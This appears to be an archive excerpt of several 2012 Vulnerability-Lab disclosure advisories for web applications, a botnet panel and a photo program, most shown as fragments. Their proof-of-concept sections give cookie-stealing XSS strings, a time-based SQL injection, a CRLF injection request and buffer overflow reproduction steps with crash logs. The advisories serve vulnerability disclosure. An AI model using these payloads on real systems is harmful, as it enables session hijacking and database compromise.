attacker edit the user and change the email to the malicious code. The error message will not show up and the code will get executed for any user who will list the contacts. URL: http://emailmarketer.127.0.0.1:337/admin/index.php?Page=SubscribersAction=ViewList=7id=5019 URL: http://emailmarketer.127.0.0.1:337/admin/index.php?Page=SubscribersAction=Add 1.2.4 The attacker can inject a malicious code in the server side by creating a content block from Dynamic content tags section. The field block name is vulnerable. Whenver the victim views the blocks the code gets Executed. URL: http://emailmarketer.127.0.0.1:337/admin/index.php?Page=AddonsAddon=dynamiccontenttagsAction=edit 1.2.5 Finally, Any of the activities gets logged in the recent activity module that gets showed in every screen in the web app. If the attacker done with persistent malicious attacks any of the previous malicious actions the code will get executed again in the recent activity module. 1.3 PoC: http://emailmarketer.127.0.0.1:337/admin/index.php?Page=AddonsAddon= dynamiccontenttagsAction=%3E%22%3Ciframe%20src=http://www.vulnerability-lab.com%20onload=alert%28%22VL%22%29%3C/iframe%3E Risk: = 1.1 The security risk of the remote SQL Injection vulnerability is estimated as critical. 1.2 The security risk of the persistent input validation vulnerabilities are estimated as medium(+). 1.3 The security risk of the client side cross site scripting vulnerability is estimated as low(+). Credits: Vulnerability Laboratory [Research Team] - Ibrahim El-Sayed (the_storm) [st...@vulnerability-lab.com] [iel-sayed.blogspot.com] Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section:video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
GTA UTM Firewall GB 6.0.3 - Multiple Web Vulnerabilities
=hiddeninput id=strength name=strength value=95 type=hiddeninput id=secret_hidden name=secret_hidden value= type=hiddeninput id=allowGenCert name=allowGenCert value=1 type=hiddeninput id=remotePW_hidden name=remotePW_hidden value= type=hidden iframe src=user-list_data/[PERSISTENT SCRIPT CODE!]' =/td/tr tr td ... identity class=forminput id=identity name=identity type=text size=60 maxlength=127 value=iframe src=[PERSISTENT SCRIPT CODE!] #34;) / /td /tr ... fullName td colspan=3input class=forminput id=fullName name=fullName type=text size=60 maxlength=59 value=iframe src=a [PERSISTENT SCRIPT CODE!]) / /td /tr tr ... desc td colspan=3input class=forminput id=desc name=desc type=text size=60 maxlength=79 value=iframe src=a #34;[PERSISTENT SCRIPT CODE!]) / /td /tr ... or the secret_hidden input id=strength name=strength value=95 type=hiddeninput id=secret_hidden name=secret_hidden value= type=hidden[PERSISTENT SCRIPT CODE!])' =input id=allowGenCert name=allowGenCert type=hidden value=1 / URL:http://gta.127.0.0.1/config/accounts/user/user-fs_en_6.0.3 Review: VPN Certificate - Details Listing tr td class=formlabelSubject:/td tdemailAddress = \[PERSISTENT SCRIPT CODE!]) , CN = \[PERSISTENT SCRIPT CODE!]) , O = [PERSISTENT SCRIPT CODE!] , L = [PERSISTENT SCRIPT CODE!]) , ST = [PERSISTENT SCRIPT CODE!]) , C = US, OU = i[PERSISTENT SCRIPT CODE!]) /td /tr Note: The vulnerable content certificate can also be exported via download function to review the problem. URL: http://gta.127.0.0.1/config/vpn/certs/certs-fs_en_6.0.3 Solution: = Parse the input field values secret_hidden, remotePW_hidden, identity, form input desc, fullName emailAddress. Restrict the name input fields with a special filter when processing to load strings with tags like ( , double quotes co. ...). Parse also the vulnerable output listing were the script code is getting unsanitized executed out of the waf application context. Note: Your company can use the following public non malicious string list to verify or update ... URL:http://www.vulnerability-lab.com/resources/documents/531.txt Risk: = The vulnerabilities can be exploited with low required user inter action privileged user account. The security risk of the persistent input validation vulnerabilities are estimated as medium. Credits: Vulnerability Laboratory [Research Team] -Benjamin Kunz Mejri (b...@vulnerability-lab.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section:video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team the specific authors or managers. To record, list (feed), modify, use or edit our material contact (ad...@vulnerability-lab.com or supp...@vulnerability-lab.com) to get a permission. Copyright © 2012 | Vulnerability Laboratory -- VULNERABILITY RESEARCH LABORATORY LABORATORY RESEARCH TEAM CONTACT: resea...@vulnerability-lab.com
Endpoint Protector v4.0.4.0 - Multiple Web Vulnerabilities
EXECUTION!]' = size=30 Example: w2003server /div Review: List of Computers, Users or Groups in Details Edit Checklist Name ul class=sf_admin_checklist liinput name=associated_group[] id=associated_group_1 value=1 type=checkbox label for=associated_group_1sali/label/li liinput name=associated_group[] id=associated_group_2 value=2 type=checkbox label for=associated_group_2allow/label/li liinput name=associated_group[] id=associated_group_3 value=3 type=checkbox label for=associated_group_3IT Support/label/li liinput name=associated_group[] id=associated_group_4 value=4 type=checkbox label for=associated_group_4allowvpn/label/li liinput name=associated_group[] id=associated_group_5 value=5 type=checkbox label for=associated_group_5Gruppe-No-USB/label/li liinput name=associated_group[] id=associated_group_6 value=6 type=checkbox label for=associated_group_6iframe src=Endpoint%20Protector%204%20-%20Reporting%20and%20Administration%20Tool-5-[PERSISTENT SCRIPT CODE CONTEXT EXECUTION!]' = label=/li /ul Risk: = The security risk of the persistent input validation vulnerabilities are estimated as high(-). Credits: Vulnerability Laboratory [Research Team] -Benjamin Kunz Mejri (b...@vulnerability-lab.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section:video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team the specific authors or managers. To record, list (feed), modify, use or edit our material contact (ad...@vulnerability-lab.com or supp...@vulnerability-lab.com) to get a permission. Copyright © 2012 | Vulnerability Laboratory -- VULNERABILITY RESEARCH LABORATORY LABORATORY RESEARCH TEAM CONTACT: resea...@vulnerability-lab.com
vOlk Botnet Framework v4.0 - Multiple Web Vulnerabilities
. For demonstration or reproduce ... MSN Stealer: The msn stealer module inside of the application displays the Bot's Name unsanitized. To infect the attacker back the victim can simulate a fake msn account login on a infected system with malicious persistent script code as Bot's Name. The result is a persistent script code execution out of Bot's Name web context in the messenger listing. The victim can hijack the vOlks Botnet Panel sessions or manipulate the framework with own malicious persistent context to stop, block, take over or disable the service. Review: MSN STEALER - BOTS NAME tbodytr td width=2%div align=center font color=#FF face=Verdana size=1bID/b/font/div/td td width=12%div align=centerb font color=#FF face=Verdana size=1Bot's Name /font /b /div/td td width=6%div align=centerb font color=#FF face=Verdana size=1Pais /font /b /div/td td width=79%div align=centerb font color=#FF face=Verdana size=1Login de msnmsgr.exe /font /b /div/td /tr tr tddiv align=centerfont color=#CC1/font/div font color=#CC/font/td tddiv align=centerfont color=#CC[[PERSISTENT INJECTED SCRIPT CODE!]]/font/div font color=#CC/font/td Review: Visit Webpage - Open URL table style=border-style:solid; border-width:1px; background=archivos/imagen/fondo.png height=69 width=96% tbodytr td align=left bgcolor=#33 height=26 width=29%font color=#FF face=Verdana size=1Open URL Bots: /font/td td align=left bgcolor=#33 width=68%div span style=margin-left:0px name=div_1_mensaje id=div_1_mensaje font face=Verdana size=1 input name=domin id=domin style=border:1px solid #FF; width: 420; color:#66; font-family: Verdana; font-size:8pt; background-color:#00; float:left; height:17 value=[[PERSISTENT INJECTED SCRIPT CODE!]];) = size=1 /font /span /div/td /tr Review: Download File table style=border-style:solid; border-width:1px; background=archivos/imagen/fondo.png height=83 width=99% tbodytr td align=left bgcolor=#33 height=19 width=29%font color=#FF face=Verdana size=1Download url:/font/td td align=left bgcolor=#33 height=19 width=68%div font face=Verdana size=1 input name=https id=https style=border:1px solid #FF; width: 394; font-family:Verdana; font-size:8pt; color:#66; background-color:#00; float:left; height:17 value=http://www.;[[PERSISTENT INJECTED SCRIPT CODE!]];) .com= size=1 /font /span /div/td /tr Review: Settings - Administrator Username Administrator Password tbodytr td align=left bgcolor=#33 height=21 width=30% font color=#FF face=Verdana size=1User Administrator :/font/td td align=left bgcolor=#33 width=70%div span style=margin-left:0px name=div_1_mensaje id=div_1_mensaje font face=Verdana size=1 input style=border:1px solid #FF; width: 300px; font-family:Verdana; font-size:8pt; color:#66; background-color:#00 value=[[PERSISTENT INJECTED SCRIPT CODE!]] disabled=disabled name=User id=User size=1 type=text[[PERSISTENT INJECTED SCRIPT CODE!]] /font/span /div/td /tr tr td align=left bgcolor=#33 height=21 width=30%font color=#FF face=Verdana size=1Password Administrator :/font/td td align=left bgcolor=#33 width=70% span style=margin-left:0px name=div_segundos id=div_segundos font face=Verdana size=1 input name=Pasw id=Pasw style=border:1px solid #FF; width: 300px; font-family:Verdana; font-size:8pt; color:#66; background-color:#00 value=\ type=text[[PERSISTENT INJECTED SCRIPT CODE!]];) = size=70/font/span/td /tr Risk: = 1.1 The security risk of the sql injection vulnerabilities are estimated as critical. 1.2 The security risk of the persistent script code inject vulnerabilities are estimated as medium(+). Credits: Vulnerability Laboratory [Research Team] -Karim H.B. (k...@vulnerability-lab.com) Vulnerability Laboratory [Research Team] -Benjamin Kunz Mejri (b...@vulnerability-lab.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
CMSQLITE v1.3.2 - Multiple Web Vulnerabiltiies
:8080/cmsqlite/admin/helper/deleteMenu.php http://cmsqlite.127.0.0.1:8080/cmsqlite/admin/helper/deleteArticle.php http://cmsqlite.127.0.0.1:8080/cmsqlite/admin/helper/deleteCategory.php Risk: = 1.1 The security risk of the local file include vulnerability is estimated as high(-). 1.2 The security risk of the client site cross site scripting vulnerability is estimated as medium(-). 1.3 The security risk of the client site cross site request forgery vulnerabilties are estimated as low(+). Credits: Katharina S.L. (ka...@vulnerability-lab.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section:video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team the specific authors or managers. To record, list (feed), modify, use or edit our material contact (ad...@vulnerability-lab.com or supp...@vulnerability-lab.com) to get a permission. Copyright © 2012 | Vulnerability Laboratory -- VULNERABILITY RESEARCH LABORATORY LABORATORY RESEARCH TEAM CONTACT: resea...@vulnerability-lab.com
NetCat CMS v5.0.1 - Multiple Web Vulnerabilities
Title: == NetCat CMS v5.0.1 - Multiple Web Vulnerabilities Date: = 2012-10-31 References: === http://www.vulnerability-lab.com/get_content.php?id=738 VL-ID: = 738 Common Vulnerability Scoring System: 2.5 Introduction: = Vendor Website: http://netcat.ru (RU) Abstract: = The Security Effect Research Team discovered multiple Web Vulnerabilities in the russian Bce NetCat v5.0.1 content management system. Report-Timeline: 2012-10-31: Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = Medium Details: Multiple client side cross site scripting and http parameter pollution vulnerabilities are detected in the russian Bce NetCat v5.0.1 content management system. The non persistent cross site scripting vulnerabilities allow remote attackers to form malicious client side web requests to steal cms customer session information. The client side crlf vulnerability allows remote attackers to change the GET and POST request with own values to manipulate the http protocol request. The first client side cross site scripting vulnerability is located in the search module with the bound vulnerable search_query application parameter. The secound http parameter pollution vulnerability is located in the post.php file when processing to request via the bound vulnerable redirect_url parameter request. Successful exploitation of the vulnerabilities can result in client side http parameter manipulation via post/get, client side phishing, client side cookie stealing via cross site scripting and client side cms web context manipulation. Vulnerable Module(s): [+] search [+] post Vulnerable Parameter(s): [+] search_query [+] redirect_url Proof of Concept: = 1. Client Side - Cross Site Scripting The client side cross site scripting vulnerabilities can be exploited by remote attackers without privileged application user account and with medium or high required user inter action. For demonstration or reproduce ... 1.1 - In URL address. PoC: http://site.127.0.0.1:3666/?’ onmouseover=’prompt(document.cookie)’bad=’ 1.2 - In “search_query” parameter. PoC: http://site.127.0.0.1:3666/search/?search_query=’ onmouseover=prompt(document.cookie) bad=’ 2. Client Side via POST - CRLF injection/HTTP Parameter Pollution The client side crlf vulnerability can be exploited by remote attackers without privileged application user account and with medium or high required user inter action. For demonstration or reproduce ... In /netcat/modules/netshop/post.php URL encoded POST input redirect_url was set to NetCatStatus:hacked_by_seceffect PoC: POST http://site.127.0.0.1:3666/netcat/modules/netshop/post.php cart%5b353%5d%5b10%5d=1cart_mode=addredirect_url=%0d%0a%20NetCatStatus:hacked_by_seceffect Risk: = 1.1 The security risk of the client side cross site scripting vulnerabilities are estimated as low(+)|(-)medium. 1.2 The security risk of the http parameter pollution vulnerability is estimated as medium(-). Credits: SECURITY EFFECT [Research Team] - (http://seceffect.tumblr.com/) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section:video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from
VaM Shop v1.69 - Multiple Web Vulnerabilities
Title: == VaM Shop v1.69 - Multiple Web Vulnerabilities Date: = 2012-10-24 References: === http://www.vulnerability-lab.com/get_content.php?id=730 VL-ID: = 730 Common Vulnerability Scoring System: 8.1 Introduction: = (Vendor Website: http://vamshop.ru/ ) Abstract: = The Security Effect Research Team discovered multiple Web Vulnerabilities in the VaM Shop v1.69 web application cms. Report-Timeline: 2012-10-24: Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = High Details: 1.1 A laboratory researcher discovered a critical sql injection vulnerability in the VaM Shop v1.69 web application content management system. The sql vulnerability allow remote attackers to inject/execute own sql commands/statements on the affected VaM Shop v1.69 web application dbms. The vulnerability is located in the shopping_cart.php files with the bound vulnerable products_id parameter request. The vulnerability can be exploited by remote attackers without required user inter action. Successful exploitation of the vulnerability results in web application dbms and service compromise or stable application manipulation via sql injection. Vulnerable Files(s): [+] shopping_cart.php Vulnerable Parameter(s): [+] products_id 1.2 A laboratory researcher discovered a client side Cross Site Scripting Vulnerability in the VaM Shop v1.69 web application content management system. The vulnerability is located in the advanced_search_result.php file when processing to load script code out of the search results web context. Successful exploitation results in session hijacking, non -persistent account phishing or client side content manipulation. Vulnerable Files(s): [+] advanced_search_result.php Proof of Concept: = 1. Blind SQL injection in shopping_cart.php in parameter product_id[]. The SQL Injection vulnerability can be exploited by remote attackers without privileged application user account. For demonstration or reproduce ... PoC: POST - SQL INJECTION /shopping_cart.php ?action=update_product cart_delete[]=2071cart_quantity[]=1old_qty[]=1products_id[]=2071'[SQL INJECTION VULNERABILITY] and sleep(37)%3d%27 2. Multiple Cross Site Scripting The client side cross site scripting vulnerabilities can be exploited by remote attacker with medium or high required user inter action. For demonstration or reproduce ... PoC: /advanced_search_result.php/o onmouseover=prompt(document.cookie) // /shopping_cart.php?action=update_product cart_delete[]=o onmouseover=prompt(document.cookie) // Risk: = 1. The security risk of the blind sql injection vulnerability is estimated as high(+). 2. The security risk of the client side cross site scripting vulnerability is estimated as low(+). Credits: SECURITY EFFECT [Research Team] - (http://seceffect.tumblr.com/) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section:video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories
BananaDance Wiki b2.2 - Multiple Web Vulnerabilities
Title: == BananaDance Wiki b2.2 - Multiple Web Vulnerabilities Date: = 2012-11-10 References: === http://www.vulnerability-lab.com/get_content.php?id=745 VL-ID: = 745 Common Vulnerability Scoring System: 7.1 Introduction: = Banana Dance is an open-source PHP/MySQL-based program. It is designed to combine the simplicity of wiki-publishing software with the versatility of a CMS. The program also promotes community-building through organized and user-rated commenting features. Highly flexible with theme-integration and extension availability Banana Dance can be used for all types of purposes, whether it be to create an entire website, a product owner`s manual, or an `article`-posting site. (Copy of the Vendor Homepage: http://www.bananadance.org ) Abstract: = The vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the official BananaDance Wiki b2.2 CMS. Report-Timeline: 2012-11-10: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = High Details: 1.1 A SQL Injection vulnerability is detected in the BananaDance Wiki B2.2 Content Management System. The vulnerability allows an attacker (remote) or local privileged moderator/admin user account to execute own SQL commands on the affected application dbms. The sql injection vulnerability is located in user management module with the bound vulnerable alpha listing parameter. Successful exploitation of the vulnerability results in dbms application compromise. Exploitation requires no user interaction without privileged user account. Vulnerable Module(s): [+] User Management Vulnerable Parameter(s): [+] alpha 1.2 Multiple persistent input validation vulnerabilities are detected in the BananaDance Wiki B2.2 Content Management System. The bugs allow remote attackers to implement/inject malicious script code on the application side (persistent) of the vulnerable module. The persistent vulnerabilities are located in the user, banned user, badge module listing with the bound vulnerable username and email parameters. Successful exploitation of the vulnerability can lead to session hijacking (manager/admin) or stable (persistent) context manipulation. Exploitation requires low user inter action (view listing) a registered low privileged web application user account. Vulnerable Module(s): [+] Add User - Listing [+] Banned User - Listing [+] Badges - Listing Vulnerable Parameter(s): [+] Username Email (Profil) Proof of Concept: = 1.1 The sql injection vulnerability can be exploited by local privileged user accounts and moderators. For demonstration or reproduce ... PoC: html headbody titleBananaDance Wiki b2.2 - SQL Vulnerability/title iframe src=http://bananadance-wiki.127.0.0.1:1339/admin/index.php?l=usersalpha=A'-1 [SQL-INJECTION!]-- width=1000 height=800 iframe src=http://bananadance-wiki.127.0.0.1:1339/admin/index.php?l=usersalpha=M'-1 [SQL-INJECTION!]-- width=1000 height=800 iframe src=http://bananadance-wiki.127.0.0.1:1339/admin/index.php?l=usersalpha=K'-1 [SQL-INJECTION!]-- width=1000 height=800 /body/head html 1.2 The persistent input validation vulnerabilities can be exploited by remote attacker with low privileged application user account and low required user inter action. For demonstration or reproduce ... Review: Add (Existing) User - Listing tr id=19 td valign=topcenterimg src=imgs/status-on.png id=status19 alt=Active title=Active border=0 height=16 width=16/center/td td valign=topa href=index.php?l=users_editid=19[PERSISTENT EXECUTION OF INJECTED SCRIPT CODE!];) = a=/td td valign=top2012-06-20/td td valign=topspan style=ESTANDAR/span/td td valign=top0/td td valign=top0/td td valign=top0/td td valign=topa href=# onClick=deleteID('bd_users','19');return false; img src=imgs/icon-delete.png border=0 alt=Delete title=Delete //a/td /tr URL(s): http://bananadance-wiki.127.0.0.1:1339/admin/index.php?l=users http://bananadance-wiki.127.0.0.1:1339/admin/index.php?l=users_add Risk: = 1.1 The security risk of the local sql injection vulnerability is estimated as medium(+) because of the required moderator account. 1.2 The security risk of the persistent input validation vulnerabilities are estimated as high. Credits: Vulnerability Laboratory [Research Team] - Kathrin SL (ka...@vulnerability-lab.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability
Eventy CMS v1.8 Plus - Multiple Web Vulnerablities
as critical. 1.2 The security risk of the persistent input validation vulnerability is estimated as medium(+). 1.3 The security risk of the client side cross site scripting vulnerability is estimated as low(+). Credits: Vulnerability Laboratory [Research Team] - Ibrahim El-Sayed (the_storm) [st...@vulnerability-lab.com] [iel-sayed.blogspot.com] Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section:video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team the specific authors or managers. To record, list (feed), modify, use or edit our material contact (ad...@vulnerability-lab.com or supp...@vulnerability-lab.com) to get a permission. Copyright © 2012 | Vulnerability Laboratory -- VULNERABILITY RESEARCH LABORATORY LABORATORY RESEARCH TEAM CONTACT: resea...@vulnerability-lab.com
Zoner Photo Studio v15 b3 - Buffer Overflow Vulnerabilities
=no name=PenTest40 / /keyword keyword category=yes name=[BUFFER OVERFLOW (EIPEBX) VIA IMPORT KEYWORDS!] keyword category=yes name=31337; / keyword category=no name=Ibrahim El-Sayed / keyword category=no name=PenTest41 / keyword category=no name=PenTest42 / keyword category=no name=PenTest43 / keyword category=no name=PenTest44 / keyword category=no name=PenTest45 / keyword category=no name=PenTest46 / keyword category=no name=PenTest47 / keyword category=no name=PenTest48 / keyword category=no name=PenTest49 / /keyword /hierarchy /keywords'; ? --- Debug Logs --- (3a98.1840): Access violation - code c005 eax= ebx=00410041 ecx=31e7 edx=0878dd68 esi=0021ced0 edi= eip=41414141 esp=0021ce68 ebp=0021cebc iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=0246 ntdll!ZwRaiseException+0x12: 76fd15de 83c404 add esp,4 0:000 u ntdll!ZwRaiseException+0x12: 76fd15de 83c404 add esp,4 76fd15e1 c20c00 ret 0Ch ntdll!NtRaiseHardError: 76fd15e4 b83001 mov eax,130h 76fd15e9 33c9xor ecx,ecx 76fd15eb 8d542404lea edx,[esp+4] 76fd15ef 64ff15c000 calldword ptr fs:[0C0h] 76fd15f6 83c404 add esp,4 76fd15f9 c21800 ret 18h 0:000 a 76fd15de !exchain 1.2 The buffer overflow vulnerability can be exploited by local attackers with low privileged system user account and without required user inter action. For demonstration or reproduce ... Manually Exploitation/Reproduce: Publizieren Per Mail versenden Zip Comprimierung der Bilder Archivname + FILE.[ZIP] (STRG+UMS+M) 1. Install start the Zoner Photo Studio Software 2. Click in the main menu the Publizieren button and open the Per Mail versenden function - STRG+UMS+M 3. Activate the Zip Compressed Pictures function (Zip Comprimierung der Bilder) 4. Now, you see the standard value (Dateien.zip) 5. Delete one of both words but do not delete the `.` because it is required for a not invalid submission (via OK Button) 6. Include the following example strings Daten.[+Large String AA+] or [Large String AA+].zip and click OK! 7. *BAM! Result is a stack-based buffer overflow [overwrites the ebx eip] --- Exception Logs --- EventType=BEX [Buffer Overflow] EventTime=129972361437653387 ReportType=2 Consent=1 ReportIdentifier=cfbd2b2a-2d1f-11e2-be0d-8c500fdd2fd9 IntegratorReportIdentifier=cfbd2b29-2d1f-11e2-be0d-8c500fdd2fd9 WOW64=1 Response.type=4 Sig[0].Name=Anwendungsname Sig[0].Value=Zps.exe Sig[1].Name=Anwendungsversion Sig[1].Value=14.0.1.7 Sig[2].Name=Anwendungszeitstempel Sig[2].Value=4fffeaeb Sig[3].Name=Fehlermodulname Sig[3].Value=StackHash_24fa Sig[4].Name=Fehlermodulversion Sig[4].Value=0.0.0.0 Sig[5].Name=Fehlermodulzeitstempel Sig[5].Value= Sig[6].Name=Ausnahmeoffset Sig[6].Value=41414141=== EIP Sig[7].Name=Ausnahmecode Sig[7].Value=c005 Sig[8].Name=Ausnahmedaten Sig[8].Value=0008 --- Debug Logs --- - Access violation - code c005 ebx=00410041 eip=41414141 Risk: = The security risk of the local buffer overflow vulnerabilities are estimated as medium(+)|(-)high. Credits: Vulnerability Laboratory [Research Team] -Benjamin Kunz Mejri (b...@vulnerability-lab.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion 